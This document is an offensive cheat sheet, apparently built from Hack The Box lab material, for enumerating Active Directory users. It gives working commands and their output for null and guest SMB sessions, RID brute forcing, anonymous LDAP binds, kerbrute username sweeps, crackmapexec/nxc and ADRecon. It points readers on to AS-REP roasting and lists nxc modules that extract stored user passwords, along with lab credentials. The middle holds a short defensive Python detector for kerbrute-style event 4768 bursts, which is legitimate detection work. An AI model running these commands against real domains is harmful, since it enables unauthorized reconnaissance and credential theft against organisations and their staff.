User Identification

Guest and null session
SMB (445, 139) / RPC
Null Session
$ enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
administrator
guest
krbtgt
lab_adm
htb-student
<SNIP>
$ rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
crackmapexec smb 172.16.5.5 -u '' -p '' --users
nxc smb 10.10.11.35 -u '' -p '' --shares
Once you have a user list, try AS-REP roasting with getNPUsers.py; no credentials are needed.
Guest session
nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
# Create a user list
nxc smb 10.10.118.214 -u 'guest' -p '' --rid-brute | grep '(SidTypeUser)' | awk '{print $6}' | sed 's/DOMAIN\\//'
nxc smb 10.10.11.35 -u 'guest' -p '' --shares
Wordlist
jsmith.txt
and many other useful username lists, such as service-accounts.txt, test-accounts or top-formats.txt
From LinkedIn
Social Media
LDAP
Nom Nom
Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP)
Anonymous bind
$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
guest
ACADEMY-EA-DC01$
ACAD
Description field
# ldapsearch -H ldap://baby.vl -x -b "DC=baby,DC=vl" | fgrep desc
$ ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 2906 users:
cn: Guest
cn: Htb Student
userPrincipalName: htb-student@inlanefreight.local
Once you have a user list, try AS-REP roasting with getNPUsers.py; no credentials are needed.
NXC
nxc ldap 192.168.1.48 -u "user.txt" -p '' -k

Kerbrute
Precompiled release:
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users.txt
$ vim valid_ad_users.txt
$ awk '{print $NF}' valid_ad_users.txt >> ad_users.txt
kerbrute does not always find AS-REP roastable accounts. Always run getNPUsers.py as well; it needs no credentials, just a list of users.
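As an added defensive example (not part of this cheat sheet), a small Python detector for the log footprint that kerbrute userenum leaves on a domain controller: with Kerberos authentication service auditing enabled, every AS-REQ for an account that does not exist is logged as Security event 4768 with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), so a burst of such failures from one client address in a short window is the signal. The CSV records, threshold and window below are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Security event 4768 records exported as CSV with the
# fields TimeCreated, IpAddress, TargetUserName, Status. Status 0x6 means
# KDC_ERR_C_PRINCIPAL_UNKNOWN: the requested account does not exist.
SAMPLE_4768 = """\
2024-05-01T10:00:01,10.10.14.7,asmith,0x6
2024-05-01T10:00:01,10.10.14.7,bjones,0x6
2024-05-01T10:00:02,10.10.14.7,cbrown,0x6
2024-05-01T10:00:02,10.10.14.7,jsmith,0x0
2024-05-01T10:00:03,10.10.14.7,dlee,0x6
2024-05-01T10:00:03,10.10.14.7,ewang,0x6
2024-05-01T10:00:04,10.10.14.7,fkhan,0x6
2024-05-01T10:00:04,10.10.14.7,gdoe,0x6
2024-05-01T09:30:00,10.10.14.9,htb-studnet,0x6
2024-05-01T09:30:05,10.10.14.9,htb-student,0x0
"""

def parse_4768(text):
    """Parse CSV rows into dicts; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, status = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "ip": ip,
                       "user": user, "status": status.lower()})
    return events

def detect_user_enum(events, threshold=5, window_seconds=60):
    """Return {ip: peak_failures} for every client whose count of 0x6
    failures inside some sliding window of window_seconds reaches threshold.
    A single typo (one 0x6 from a host) never trips it; a username sweep does."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["status"] == "0x6":
            by_ip[ev["ip"]].append(ev["time"])
    alerts, window = {}, timedelta(seconds=window_seconds)
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop events older than the window
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts

if __name__ == "__main__":
    for ip, n in detect_user_enum(parse_4768(SAMPLE_4768)).items():
        print(f"possible Kerberos user enumeration from {ip}: {n} unknown-principal failures")
```

Feed it real 4768 exports and tune the threshold to your environment's baseline of mistyped logons.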

LLMNR NBT-NS Poisoning
Authenticated
sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
$ sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users > users.txt
$ cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > final_users.txt
Windows
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
Or with the GUI: Properties -> Security -> Advanced -> Effective Access -> Select a User -> Advanced -> Object Types, then "Find Now"

Columns to add: Description

ADrecon
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
PS C:\htb> .\ADRecon.ps1
[*] ADRecon v1.1 by Prashant Mahajan (@prashant3535)
[*] Running on INLANEFREIGHT.LOCAL\MS01 - Member Server
[*] Commencing - 03/28/2022 09:24:58
[-] Domain
[-] Forest
[-] Trusts
[-] Sites
[-] Subnets
[-] SchemaHistory - May take some time
[-] Default Password Policy
[-] Fine Grained Password Policy - May need a Privileged Account
[-] Domain Controllers
[-] Users and SPNs - May take some time
[-] PasswordAttributes - Experimental
[-] Groups and Membership Changes - May take some time
[-] Group Memberships - May take some time
[-] OrganizationalUnits (OUs)
[-] GPOs
[-] gPLinks - Scope of Management (SOM)
[-] DNS Zones and Records
[-] Printers
[-] Computers and SPNs - May take some time
[-] LAPS - Needs Privileged Account
[-] BitLocker Recovery Keys - Needs Privileged Account
[-] GPOReport - May take some time
[*] Total Execution Time (mins): 11.05
[*] Output Directory: C:\Tools\ADRecon-Report-20220328092458
NXC
nxc ldap 192.168.1.48 -u raj -p Password@1 --users
# Active users
nxc ldap 192.168.1.48 -u raj -p Password@1 --active-users
# Domain admins
nxc ldap 192.168.1.48 -u raj -p Password@1 --admin-count
# Users description
nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users
# Get Users Password
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-unixUserPassword